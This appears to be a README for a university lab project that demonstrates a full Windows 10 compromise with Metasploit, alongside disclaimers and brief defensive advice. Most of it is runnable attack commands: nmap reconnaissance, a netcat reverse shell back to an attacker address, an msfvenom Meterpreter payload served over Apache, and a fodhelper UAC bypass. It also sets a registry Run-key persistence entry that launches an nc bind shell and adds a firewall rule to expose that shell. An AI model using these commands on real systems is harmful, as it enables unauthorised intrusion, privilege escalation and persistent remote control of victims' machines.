THIS PROJECT IS FOR EDUCATIONAL PURPOSES ONLY
All techniques demonstrated in this project were performed in a controlled lab environment with explicit authorization. These methods should NEVER be used on systems without proper authorization.
Unauthorized access to computer systems is illegal and punishable by law.
Practical implementation of Windows penetration testing techniques using Metasploit Framework, demonstrating exploitation, post-exploitation, and persistence mechanisms in a controlled environment.
Academic Project | Master 2 - Sécurité des Systèmes d'Information | 2024-2025
- Understand Windows exploitation techniques
- Master Metasploit Framework and Meterpreter
- Implement post-exploitation strategies
- Establish persistence mechanisms
- Comprehend attacker TTPs (Tactics, Techniques, and Procedures)
- Develop defensive mindset through offensive security
- Kali Linux - Penetration testing distribution
- Metasploit Framework - Exploitation framework
- Meterpreter - Advanced payload
- Msfvenom - Payload generator
- NetCat (nc) - Network utility for reverse shells
- Windows 10 - Target operating system
- NSClient++ - Windows monitoring agent (used as attack vector)
- Reverse TCP connections
- Payload generation and delivery
- User Account Control (UAC) bypass
- Registry-based persistence
- Windows Firewall manipulation
- Post-exploitation enumeration
Network Discovery:
# Host discovery
nmap -sn 192.168.1.0/24
# Port scanning
nmap -sV -p- 192.168.1.2
# Service enumeration
nmap -sC -sV 192.168.1.2On Kali Linux (Attacker):
# Start NetCat listener
nc -lvp 4444On Windows 10 (Target):
# Establish reverse connection
ncat 192.168.1.3 4444 -e cmd.exeResult: Direct command shell access
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=192.168.1.3 \
LPORT=3333 \
-f exe \
-o runme.exeDelivery:
# Host on web server
mv runme.exe /var/www/html/
systemctl start apache2msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 3333
exploit -jMeterpreter Commands:
sysinfo # System information
getuid # Current user
ps # Running processes
ipconfig # Network configuse exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set LHOST 192.168.1.3
set LPORT 3333
exploitResult: Administrative privileges without UAC prompt
Registry Persistence:
# Upload NetCat
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32\\nc.exe
# Registry entry
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run \
-v netcat \
-d "C:\\Windows\\system32\\nc.exe -lvp 4445 -e cmd.exe"Firewall Rule:
netsh advfirewall firewall add rule ^
name="netcat" ^
protocol=TCP ^
dir=in ^
localport=4445 ^
action=allow| Attack Phase | Technique | Success Rate |
|---|---|---|
| Initial Access | NetCat reverse shell | ✅ 100% |
| Payload Delivery | Msfvenom executable | ✅ 100% |
| Exploitation | Meterpreter session | ✅ 100% |
| Privilege Escalation | UAC bypass | ✅ 100% |
| Persistence | Registry Run key | ✅ 100% |
- Monitor unusual outbound connections
- Detect registry Run key modifications
- Use EDR (Endpoint Detection and Response)
- Enable Windows Defender Real-Time Protection
- Monitor firewall rule changes
- ✅ Keep systems patched
- ✅ Use robust antivirus
- ✅ Enable Windows Defender
- ✅ Implement application whitelisting
- ✅ Use least privilege principle
- ✅ Monitor registry changes
- ✅ Network segmentation
- ✅ Strong authentication (MFA)
- Metasploit Framework proficiency
- Payload generation with Msfvenom
- Meterpreter post-exploitation
- Windows privilege escalation
- UAC bypass techniques
- Registry manipulation
- Persistence mechanisms
- Network reconnaissance
- Attack lifecycle (Kill Chain)
- Post-exploitation strategies
- Privilege escalation
- Defense evasion tactics
- Attacker TTPs
- Incident response
Mariama DIACK
Master 2 - Sécurité des Systèmes d'Information
IMPORTANT: This project is strictly for educational purposes in a controlled academic environment. Misuse of these techniques is illegal and unethical.